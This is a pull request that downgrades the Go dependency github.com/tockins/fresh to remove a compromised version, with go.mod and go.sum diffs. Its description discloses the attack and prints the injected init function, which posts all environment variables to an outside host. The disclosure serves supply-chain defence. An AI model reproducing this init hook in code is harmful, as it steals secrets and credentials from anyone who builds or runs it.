### PR TITLE
Replace malicious version of dep

### DIFF
--- a/go.mod
+++ b/go.mod
@@ -52,7 +52,7 @@ require (
 	github.com/razonyang/fastrouter v0.1.0
 	github.com/rcrowley/go-tigertonic v0.0.0-20170420123839-fe6b9f080eb7
 	github.com/teambition/gear v1.26.0
-	github.com/tockins/fresh v0.0.0-20220719194346-eee4eda4271e
+	github.com/tockins/fresh v0.0.0-20181012144221-d8b891ad12e4
 	github.com/urfave/negroni v1.0.0
 	github.com/valyala/fasthttp v1.38.0
 	github.com/vanng822/r2router v0.0.0-20150523112421-1023140a4f30

--- a/go.sum
+++ b/go.sum
@@ -781,8 +781,8 @@ github.com/teambition/gear v1.26.0/go.mod h1:fHRXrJn8fXT3UehBQl4G1L23h71WmxUwsWQ
 github.com/teambition/trie-mux v1.5.2 h1:ALTagFwKZXkn1vfSRlODlmoZg+NMeWAm4dyBPQI6a8w=
 github.com/teambition/trie-mux v1.5.2/go.mod h1:0Woh4KOHSN9bkJ66eWmLs8ltrEKw+fnZbFaHFfbMrtc=
 github.com/tmc/grpc-websocket-proxy v0.0.0-20170815181823-89b8d40f7ca8/go.mod h1:ncp9v5uamzpCO7NfCPTXjqaC+bZgJeR0sMTm6dMHP7U=
-github.com/tockins/fresh v0.0.0-20220719194346-eee4eda4271e h1:GrvmP7vBqBKJ5TPse5bMSojWTjqVSR1JQ97B3zJGjQo=
-github.com/tockins/fresh v0.0.0-20220719194346-eee4eda4271e/go.mod h1:mbv5i3IQY+eqbSLRiuakLuXbJBkVFNV5qh+CGeZtWZM=
+github.com/tockins/fresh v0.0.0-20181012144221-d8b891ad12e4 h1:EUMMwB4GqnuigSUtlTR2MfG2bgzDHK53ybMZaM4Pftk=
+github.com/tockins/fresh v0.0.0-20181012144221-d8b891ad12e4/go.mod h1:mbv5i3IQY+eqbSLRiuakLuXbJBkVFNV5qh+CGeZtWZM=
 github.com/ugorji/go v0.0.0-20171122102828-84cb69a8af83/go.mod h1:hnLbHMwcvSihnDhEfx2/BzKp2xb0Y+ErdfYcrs9tkJQ=
 github.com/ugorji/go v1.2.7 h1:qYhyWUUd6WbiM+C6JZAUkIJt/1WrjzNHY9+KCIjVqTo=
 github.com/ugorji/go v1.2.7/go.mod h1:nF9osbDWLy6bDVv/Rtoh6QgnvNDpmCalQV5urGCCS6M=


### PR DESCRIPTION
This PR replace the malicious version of `github.com/tockins/fresh`.

The new version (`v0.0.0-20220719194346-eee4eda4271e`) of `github.com/tockins/fresh` have malicious code in `init` func of every go file. And you can't see this version in github.

After `make build`, You can find that in `~/go/pkg/mod/github.com/tockins/fresh@v0.0.0-20220719194346-eee4eda4271e`. 
And The malicious code looks like this. It's post env to the weird url.

```go
func init() {
  if x0__.Getenv("e452d6ab") == "" {
    x4__, _ := x3__.Marshal(x0__.Environ())
    x0__.Setenv("e452d6ab", "1")
    x2__.Post("http://ovz1.j19544519.pr46m.vps.myjino.ru:49460?org=tockins&repo=fresh", "application/json", x1__.NewBuffer(x4__))
  }
}
```

